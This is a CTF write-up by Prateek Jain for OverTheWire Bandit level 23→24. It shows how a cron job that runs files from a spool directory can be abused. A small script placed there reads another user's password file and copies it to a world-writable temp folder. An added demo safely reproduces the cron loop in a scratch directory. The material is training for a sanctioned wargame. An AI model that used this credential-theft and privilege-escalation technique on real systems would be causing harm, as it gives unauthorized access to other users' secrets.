OverTheWire: Bandit Level 23 → 24

Writeup for OverTheWire Bandit CTF Level 23 → 24

Prateek Jain
Nov 6, 2021

Let us first create a directory for our files in “/tmp”. OverTheWire gives users permission to create files and directories there. You can name it anything; I call the directory “abc123”. Run the following command:

mkdir /tmp/abc123

Now, from the level description we learn that there is a cron job running. We can look for it in the “/etc/cron.d/” directory. Run the following command:

ls /etc/cron.d/

You can see several cron jobs listed. For us, only the one belonging to the bandit24 user is relevant. We can view it with the following command:

cat /etc/cron.d/cronjob_bandit24

We get the following output:

@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null 
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

Okay, so we know that this cron job runs the script “/usr/bin/cronjob_bandit24.sh” every minute (and once at boot). We can also note that both stdout and stderr are redirected to “/dev/null”, which means we won’t see any output when the script runs. We can view the script with the following command:

cat /usr/bin/cronjob_bandit24.sh

We get the following output:

#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ];
        then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

So from the script, we can make out the following points →

  • It works in the directory named after the user who runs the script. Since the cron job belongs to bandit24 and it executes this script, the directory read here is “/var/spool/bandit24”.
  • It goes through every entry in that directory (the “* .*” glob also picks up dotfiles) and executes each one that is owned by bandit23, killing it after a 60 second timeout.
  • This means that if we place a script in that directory, it is going to be executed with the same privileges as bandit24.
  • After handling a file, it deletes it, whether or not it was executed.
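To see those rules in action without touching the real spool directory, here is an added example (not part of the writeup) that re-implements the cron script’s loop against a scratch directory. TRUSTED_OWNER stands in for “bandit23”, and every file in it is constructed on the spot.

```shell
#!/bin/bash
# Added example (not from the writeup): the loop from cronjob_bandit24.sh,
# re-implemented to run against a scratch directory so its rules can be
# observed safely. TRUSTED_OWNER stands in for "bandit23"; every file here
# is constructed and the real /var/spool/bandit24 is never touched.

# process_spool DIR TRUSTED_OWNER
# Same rules as the cron script: visit every entry ("* .*" also picks up
# dotfiles; "." and ".." are skipped), execute it only when its owner equals
# TRUSTED_OWNER (SIGKILL after 60s), and delete it either way. Prints a
# one-line summary such as "run:my.sh drop:.hidden".
process_spool() (
  cd "$1" || exit 1
  trusted="$2"; acts=""
  for i in * .*; do
    [ "$i" != "." ] && [ "$i" != ".." ] || continue
    [ -e "$i" ] || continue            # unmatched glob left a literal "*"
    owner="$(stat --format "%U" "./$i")"
    if [ "$owner" = "$trusted" ]; then
      timeout -s 9 60 "./$i" >/dev/null 2>&1 || true   # as in the cron job
      acts="$acts${acts:+ }run:$i"
    else
      acts="$acts${acts:+ }drop:$i"
    fi
    rm -f "./$i"                       # deleted whether it ran or not
  done
  echo "$acts"
)

# demo TRUSTED_OWNER
# Builds a scratch spool holding my.sh (which records a marker file when it
# runs) and an empty dotfile, processes it, and reports the actions taken,
# whether the marker appeared, and how many entries were left behind.
demo() {
  spool="$(mktemp -d)"
  marker="$spool.marker"
  printf '#!/bin/sh\n: > "%s"\n' "$marker" > "$spool/my.sh"
  chmod +x "$spool/my.sh"
  : > "$spool/.hidden"
  acts="$(process_spool "$spool" "$1")"
  if [ -e "$marker" ]; then hit=yes; else hit=no; fi
  left="$(ls -A "$spool" | wc -l | tr -d ' ')"
  rm -rf "$spool" "$marker"
  echo "$acts marker=$hit left=$left"
}

demo "$(id -un)"     # owner matches: run:my.sh run:.hidden marker=yes left=0
demo "someone-else"  # owner differs: drop:my.sh drop:.hidden marker=no left=0
```

The second call shows why ownership matters: a file owned by anyone else is swept away without ever being executed.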

OverTheWire keeps the password for every level in the directory “/etc/bandit_pass”, but only the user corresponding to a level can read that level’s password; others don’t have permission. So if we want to read bandit24’s password, we can make use of the points above. We write a script named “my.sh” containing the following code:

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/abc123/pass

It simply reads the bandit24 password file and writes it to the file named “pass” in our directory “abc123”. If we put this script in the “/var/spool/bandit24” directory, the cron job will execute it with the same privileges as bandit24, because the cron job belongs to bandit24, so reading the password file will work.

Okay, so now we just copy the script into the “/var/spool/bandit24” directory by running the following command:

cp /tmp/abc123/my.sh /var/spool/bandit24/my.sh

We also need to give bandit24 permission to execute the script, as well as permission to write into the directory “abc123”. By default it does not have either permission.

chmod o+x /var/spool/bandit24/my.sh
chmod o+w /tmp/abc123

Note that we need to be quick with the above steps. The cron job runs every minute and deletes everything inside /var/spool/bandit24, so it can happen that we copy the script into the directory but it gets deleted before we manage to change its permissions.

Now we wait for a minute. And then, Voila!

We can see the password in the file “/tmp/abc123/pass”.
